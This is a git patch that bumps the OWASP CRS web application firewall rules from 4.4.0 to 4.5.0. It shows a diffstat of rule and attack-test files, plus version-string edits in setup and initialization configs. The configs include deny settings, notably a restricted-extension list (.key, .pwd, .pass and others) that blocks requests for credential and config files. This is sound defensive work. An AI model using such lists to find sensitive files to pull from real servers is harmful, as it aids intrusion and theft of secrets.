From 705a226283fc3b9cd85d84202b8d4788c79cbe42 Mon Sep 17 00:00:00 2001 From: Matteo Pace Date: Thu, 25 Jul 2024 20:08:35 +0200 Subject: [PATCH] updates to CRS 4.5 (#26) --- rules/@crs-setup.conf.example | 54 +- .../REQUEST-901-INITIALIZATION.conf | 62 +- .../REQUEST-905-COMMON-EXCEPTIONS.conf | 6 +- .../REQUEST-911-METHOD-ENFORCEMENT.conf | 20 +- .../REQUEST-913-SCANNER-DETECTION.conf | 20 +- .../REQUEST-920-PROTOCOL-ENFORCEMENT.conf | 136 +- .../REQUEST-921-PROTOCOL-ATTACK.conf | 52 +- .../REQUEST-922-MULTIPART-ATTACK.conf | 8 +- .../REQUEST-930-APPLICATION-ATTACK-LFI.conf | 28 +- .../REQUEST-931-APPLICATION-ATTACK-RFI.conf | 28 +- .../REQUEST-932-APPLICATION-ATTACK-RCE.conf | 126 +- .../REQUEST-933-APPLICATION-ATTACK-PHP.conf | 52 +- ...EQUEST-934-APPLICATION-ATTACK-GENERIC.conf | 36 +- .../REQUEST-941-APPLICATION-ATTACK-XSS.conf | 86 +- .../REQUEST-942-APPLICATION-ATTACK-SQLI.conf | 142 +- ...3-APPLICATION-ATTACK-SESSION-FIXATION.conf | 24 +- .../REQUEST-944-APPLICATION-ATTACK-JAVA.conf | 46 +- .../REQUEST-949-BLOCKING-EVALUATION.conf | 58 +- .../RESPONSE-950-DATA-LEAKAGES.conf | 26 +- .../RESPONSE-951-DATA-LEAKAGES-SQL.conf | 54 +- .../RESPONSE-952-DATA-LEAKAGES-JAVA.conf | 24 +- .../RESPONSE-953-DATA-LEAKAGES-PHP.conf | 28 +- .../RESPONSE-954-DATA-LEAKAGES-IIS.conf | 28 +- rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf | 72 +- .../RESPONSE-959-BLOCKING-EVALUATION.conf | 58 +- .../@owasp_crs/RESPONSE-980-CORRELATION.conf | 44 +- .../911100.yaml | 256 +- .../REQUEST-913-SCANNER-DETECTION/913100.yaml | 224 +- .../920100.yaml | 462 +- .../920120.yaml | 1775 +- .../920121.yaml | 213 +- .../920160.yaml | 189 +- .../920170.yaml | 220 +- .../920171.yaml | 129 +- .../920180.yaml | 144 +- .../920181.yaml | 44 +- .../920190.yaml | 102 +- .../920200.yaml | 302 +- .../920201.yaml | 63 +- .../920202.yaml | 63 +- .../920210.yaml | 215 +- .../920220.yaml | 227 +- .../920221.yaml | 59 +- .../920230.yaml | 68 +- .../920240.yaml | 242 +- .../920250.yaml | 132 +- .../920260.yaml | 90 +- .../920270.yaml | 250 +- .../920271.yaml | 162 +- .../920272.yaml | 136 +- .../920273.yaml | 136 +- .../920274.yaml | 172 +- .../920275.yaml | 171 +- .../920280.yaml | 83 +- .../920290.yaml | 108 +- .../920300.yaml | 124 +- .../920310.yaml | 172 +- .../920311.yaml | 88 +- .../920320.yaml | 56 +- .../920330.yaml | 58 +- .../920340.yaml | 72 +- .../920341.yaml | 102 +- .../920350.yaml | 228 +- .../920360.yaml | 40 +- .../920370.yaml | 41 +- .../920380.yaml | 40 +- .../920390.yaml | 46 +- .../920400.yaml | 1753 +- .../920410.yaml | 1811 +- .../920420.yaml | 644 +- .../920430.yaml | 296 +- .../920440.yaml | 220 +- .../920450.yaml | 218 +- .../920451.yaml | 59 +- .../920460.yaml | 144 +- .../920470.yaml | 569 +- .../920480.yaml | 642 +- .../920490.yaml | 105 +- .../920500.yaml | 87 +- .../920510.yaml | 183 +- .../920520.yaml | 273 +- .../920521.yaml | 213 +- .../920530.yaml | 131 +- .../920540.yaml | 99 +- .../920600.yaml | 393 +- .../920610.yaml | 58 +- .../920620.yaml | 27 +- tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 344 +- tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml | 140 +- tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 128 +- tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml | 63 +- tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml | 59 +- tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml | 117 +- tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml | 171 +- tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml | 174 +- tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml | 107 +- tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml | 303 +- tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml | 81 +- tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml | 31 +- tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml | 31 +- tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml | 55 +- tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml | 339 +- tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml | 479 +- .../REQUEST-922-MULTIPART-ATTACK/922100.yaml | 147 +- .../REQUEST-922-MULTIPART-ATTACK/922110.yaml | 99 +- .../REQUEST-922-MULTIPART-ATTACK/922120.yaml | 89 +- .../930100.yaml | 119 +- .../930110.yaml | 379 +- .../930120.yaml | 314 +- .../930121.yaml | 383 +- .../930130.yaml | 60 +- .../931100.yaml | 42 +- .../931110.yaml | 118 +- .../931120.yaml | 228 +- .../931130.yaml | 620 +- .../931131.yaml | 32 +- .../932120.yaml | 152 +- .../932125.yaml | 90 +- .../932130.yaml | 488 +- .../932131.yaml | 60 +- .../932140.yaml | 5023 +++-- .../932160.yaml | 414 +- .../932161.yaml | 351 +- .../932170.yaml | 35 +- .../932171.yaml | 63 +- .../932175.yaml | 391 +- .../932180.yaml | 135 +- .../932190.yaml | 191 +- .../932200.yaml | 457 +- .../932205.yaml | 213 +- .../932206.yaml | 93 +- .../932210.yaml | 207 +- .../932220.yaml | 441 +- .../932230.yaml | 1951 +- .../932231.yaml | 39 +- .../932232.yaml | 219 +- .../932235.yaml | 1209 +- .../932236.yaml | 2601 ++- .../932237.yaml | 1001 +- .../932238.yaml | 323 +- .../932239.yaml | 1579 +- .../932240.yaml | 589 +- .../932250.yaml | 384 +- .../932260.yaml | 1384 +- .../932300.yaml | 298 +- .../932301.yaml | 211 +- .../932310.yaml | 243 +- .../932311.yaml | 413 +- .../932320.yaml | 331 +- .../932321.yaml | 183 +- .../932330.yaml | 31 +- .../932331.yaml | 59 +- .../932370.yaml | 125 +- .../932380.yaml | 281 +- .../933100.yaml | 244 +- .../933110.yaml | 882 +- .../933111.yaml | 46 +- .../933120.yaml | 292 +- .../933130.yaml | 172 +- .../933131.yaml | 88 +- .../933140.yaml | 36 +- .../933150.yaml | 943 +- .../933151.yaml | 230 +- .../933160.yaml | 1058 +- .../933161.yaml | 155 +- .../933170.yaml | 300 +- .../933180.yaml | 1031 +- .../933190.yaml | 36 +- .../933200.yaml | 284 +- .../933210.yaml | 595 +- .../933211.yaml | 595 +- .../934100.yaml | 870 +- .../934101.yaml | 294 +- .../934110.yaml | 259 +- .../934120.yaml | 1592 +- .../934130.yaml | 378 +- .../934140.yaml | 32 +- .../934150.yaml | 32 +- .../934160.yaml | 928 +- .../934170.yaml | 99 +- .../941100.yaml | 179 +- .../941101.yaml | 90 +- .../941110.yaml | 304 +- .../941120.yaml | 174 +- .../941130.yaml | 568 +- .../941140.yaml | 122 +- .../941150.yaml | 64 +- .../941160.yaml | 460 +- .../941170.yaml | 146 +- .../941180.yaml | 212 +- .../941181.yaml | 124 +- .../941190.yaml | 154 +- .../941200.yaml | 124 +- .../941210.yaml | 159 +- .../941220.yaml | 64 +- .../941230.yaml | 64 +- .../941240.yaml | 60 +- .../941250.yaml | 64 +- .../941260.yaml | 64 +- .../941270.yaml | 62 +- .../941280.yaml | 68 +- .../941290.yaml | 64 +- .../941300.yaml | 62 +- .../941310.yaml | 395 +- .../941320.yaml | 34 +- .../941330.yaml | 62 +- .../941340.yaml | 64 +- .../941350.yaml | 32 +- .../941360.yaml | 100 +- .../941370.yaml | 304 +- .../941380.yaml | 34 +- .../941390.yaml | 256 +- .../941400.yaml | 200 +- .../942100.yaml | 423 +- .../942101.yaml | 311 +- .../942120.yaml | 1181 +- .../942130.yaml | 270 +- .../942131.yaml | 189 +- .../942140.yaml | 512 +- .../942150.yaml | 573 +- .../942151.yaml | 325 +- .../942152.yaml | 87 +- .../942160.yaml | 300 +- .../942170.yaml | 116 +- .../942180.yaml | 232 +- .../942190.yaml | 1548 +- .../942200.yaml | 62 +- .../942210.yaml | 2760 ++- .../942220.yaml | 61 +- .../942230.yaml | 340 +- .../942240.yaml | 334 +- .../942250.yaml | 34 +- .../942251.yaml | 60 +- .../942260.yaml | 34 +- .../942270.yaml | 60 +- .../942280.yaml | 62 +- .../942290.yaml | 276 +- .../942300.yaml | 94 +- .../942310.yaml | 88 +- .../942320.yaml | 376 +- .../942321.yaml | 59 +- .../942330.yaml | 158 +- .../942340.yaml | 332 +- .../942350.yaml | 122 +- .../942360.yaml | 1176 +- .../942361.yaml | 214 +- .../942362.yaml | 966 +- .../942370.yaml | 329 +- .../942380.yaml | 1530 +- .../942390.yaml | 32 +- .../942400.yaml | 68 +- .../942410.yaml | 4016 ++-- .../942420.yaml | 34 +- .../942421.yaml | 34 +- .../942430.yaml | 34 +- .../942431.yaml | 34 +- .../942432.yaml | 34 +- .../942440.yaml | 588 +- .../942450.yaml | 154 +- .../942460.yaml | 64 +- .../942470.yaml | 332 +- .../942480.yaml | 364 +- .../942490.yaml | 664 +- .../942500.yaml | 143 +- .../942510.yaml | 60 +- .../942511.yaml | 60 +- .../942520.yaml | 717 +- .../942521.yaml | 715 +- .../942522.yaml | 279 +- .../942530.yaml | 33 +- .../942540.yaml | 231 +- .../942550.yaml | 1047 +- .../942560.yaml | 63 +- .../943100.yaml | 80 +- .../943110.yaml | 144 +- .../943120.yaml | 40 +- .../944000.yaml | 40 +- .../944100.yaml | 664 +- .../944110.yaml | 664 +- .../944120.yaml | 5271 +++--- .../944130.yaml | 15280 ++++++++-------- .../944140.yaml | 272 +- .../944150.yaml | 770 +- .../944151.yaml | 802 +- .../944152.yaml | 834 +- .../944200.yaml | 20 +- .../944210.yaml | 1978 +- .../944240.yaml | 3220 ++-- .../944250.yaml | 808 +- .../944260.yaml | 64 +- .../944300.yaml | 11974 ++++++------ .../949110.yaml | 145 +- .../951110.yaml | 42 +- .../951120.yaml | 43 +- .../951130.yaml | 42 +- .../951140.yaml | 42 +- .../951150.yaml | 41 +- .../951160.yaml | 42 +- .../951170.yaml | 42 +- .../951180.yaml | 42 +- .../951190.yaml | 42 +- .../951200.yaml | 42 +- .../951210.yaml | 42 +- .../951220.yaml | 81 +- .../951230.yaml | 80 +- .../951240.yaml | 80 +- .../951250.yaml | 42 +- .../951260.yaml | 42 +- .../953100.yaml | 184 +- .../953101.yaml | 194 +- .../953120.yaml | 264 +- .../954100.yaml | 36 +- .../954120.yaml | 73 +- tests/RESPONSE-955-WEB-SHELLS/955100.yaml | 118 +- tests/RESPONSE-955-WEB-SHELLS/955260.yaml | 40 +- .../959100.yaml | 113 +- tests/RESPONSE-980-CORRELATION/980170.yaml | 125 +- version.go | 2 +- 318 files changed, 65366 insertions(+), 65695 deletions(-) diff --git a/rules/@crs-setup.conf.example b/rules/@crs-setup.conf.example index 5818dbc..3ece119 100644 --- a/rules/@crs-setup.conf.example +++ b/rules/@crs-setup.conf.example @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -181,7 +181,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.blocking_paranoia_level=1" @@ -209,7 +209,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.detection_paranoia_level=1" @@ -235,7 +235,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.enforce_bodyproc_urlencoded=1" @@ -270,7 +270,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.critical_anomaly_score=5,\ # setvar:tx.error_anomaly_score=4,\ # setvar:tx.warning_anomaly_score=3,\ @@ -324,7 +324,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.inbound_anomaly_score_threshold=5,\ # setvar:tx.outbound_anomaly_score_threshold=4" @@ -385,7 +385,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.reporting_level=4" @@ -417,7 +417,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.early_blocking=1" @@ -438,7 +438,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.enable_default_collections=1" @@ -466,7 +466,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Content-Types that a client is allowed to send in a request. @@ -496,7 +496,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # nolog,\ # tag:'OWASP_CRS',\ # ctl:ruleRemoveById=920420,\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # chain" # SecRule REQUEST_URI "@rx ^/foo/bar" \ # "t:none" @@ -510,7 +510,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" # Allowed HTTP versions. @@ -526,7 +526,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" # Forbidden file extensions. @@ -550,7 +550,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" # Restricted request headers. @@ -595,7 +595,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'" # # [ Extended ] @@ -621,7 +621,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:'tx.restricted_headers_extended=/accept-charset/'" # Content-Types charsets that a client is allowed to send in a request. @@ -635,7 +635,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" # @@ -661,7 +661,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.max_num_args=255" # Block request if the length of any argument name is too high @@ -675,7 +675,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.arg_name_length=100" # Block request if the length of any argument value is too high @@ -689,7 +689,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.arg_length=400" # Block request if the total length of all combined arguments is too high @@ -703,7 +703,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.total_arg_length=64000" # Block request if the file size of any individual uploaded file is too high @@ -717,7 +717,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.max_file_size=1048576" # Block request if the total size of all combined uploaded files is too high @@ -731,7 +731,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.combined_file_sizes=1048576" @@ -771,7 +771,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # pass,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.sampling_percentage=100" @@ -792,7 +792,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.4.0',\ +# ver:'OWASP_CRS/4.5.0',\ # setvar:tx.crs_validate_utf8_encoding=1" @@ -814,5 +814,5 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ - setvar:tx.crs_setup_version=440" + ver:'OWASP_CRS/4.5.0',\ + setvar:tx.crs_setup_version=450" diff --git a/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf b/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf index d85cfc1..f7719b6 100644 --- a/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf +++ b/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,7 +7,7 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecComponentSignature "OWASP_CRS/4.4.0" +SecComponentSignature "OWASP_CRS/4.5.0" SecRule &TX:crs_setup_version "@eq 0" \ "id:901001,\ phase:1,\ @@ -17,7 +17,7 @@ SecRule &TX:crs_setup_version "@eq 0" \ auditlog,\ msg:'ModSecurity CRS is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL'" SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ "id:901100,\ @@ -25,7 +25,7 @@ SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.inbound_anomaly_score_threshold=5'" SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ "id:901110,\ @@ -33,7 +33,7 @@ SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.outbound_anomaly_score_threshold=4'" SecRule &TX:reporting_level "@eq 0" \ "id:901111,\ @@ -41,7 +41,7 @@ SecRule &TX:reporting_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.reporting_level=4'" SecRule &TX:early_blocking "@eq 0" \ "id:901115,\ @@ -49,7 +49,7 @@ SecRule &TX:early_blocking "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.early_blocking=0'" SecRule &TX:blocking_paranoia_level "@eq 0" \ "id:901120,\ @@ -57,7 +57,7 @@ SecRule &TX:blocking_paranoia_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_paranoia_level=1'" SecRule &TX:detection_paranoia_level "@eq 0" \ "id:901125,\ @@ -65,7 +65,7 @@ SecRule &TX:detection_paranoia_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" SecRule &TX:sampling_percentage "@eq 0" \ "id:901130,\ @@ -73,7 +73,7 @@ SecRule &TX:sampling_percentage "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.sampling_percentage=100'" SecRule &TX:critical_anomaly_score "@eq 0" \ "id:901140,\ @@ -81,7 +81,7 @@ SecRule &TX:critical_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.critical_anomaly_score=5'" SecRule &TX:error_anomaly_score "@eq 0" \ "id:901141,\ @@ -89,7 +89,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.error_anomaly_score=4'" SecRule &TX:warning_anomaly_score "@eq 0" \ "id:901142,\ @@ -97,7 +97,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.warning_anomaly_score=3'" SecRule &TX:notice_anomaly_score "@eq 0" \ "id:901143,\ @@ -105,7 +105,7 @@ SecRule &TX:notice_anomaly_score "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.notice_anomaly_score=2'" SecRule &TX:allowed_methods "@eq 0" \ "id:901160,\ @@ -113,7 +113,7 @@ SecRule &TX:allowed_methods "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" SecRule &TX:allowed_request_content_type "@eq 0" \ "id:901162,\ @@ -121,7 +121,7 @@ SecRule &TX:allowed_request_content_type "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" SecRule &TX:allowed_request_content_type_charset "@eq 0" \ "id:901168,\ @@ -129,7 +129,7 @@ SecRule &TX:allowed_request_content_type_charset "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" SecRule &TX:allowed_http_versions "@eq 0" \ "id:901163,\ @@ -137,7 +137,7 @@ SecRule &TX:allowed_http_versions "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" SecRule &TX:restricted_extensions "@eq 0" \ "id:901164,\ @@ -145,7 +145,7 @@ SecRule &TX:restricted_extensions "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" SecRule &TX:restricted_headers_basic "@eq 0" \ "id:901165,\ @@ -153,7 +153,7 @@ SecRule &TX:restricted_headers_basic "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'" SecRule &TX:restricted_headers_extended "@eq 0" \ "id:901171,\ @@ -161,7 +161,7 @@ SecRule &TX:restricted_headers_extended "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.restricted_headers_extended=/accept-charset/'" SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ "id:901167,\ @@ -169,7 +169,7 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.enforce_bodyproc_urlencoded=0'" SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ "id:901169,\ @@ -177,7 +177,7 @@ SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.crs_validate_utf8_encoding=0'" SecAction \ "id:901200,\ @@ -186,7 +186,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=0',\ setvar:'tx.detection_inbound_anomaly_score=0',\ setvar:'tx.inbound_anomaly_score_pl1=0',\ @@ -214,7 +214,7 @@ SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.ua_hash=%{REQUEST_HEADERS.User-Agent}',\ chain" SecRule TX:ua_hash "@unconditionalMatch" \ @@ -230,7 +230,7 @@ SecRule REQBODY_PROCESSOR "!@rx 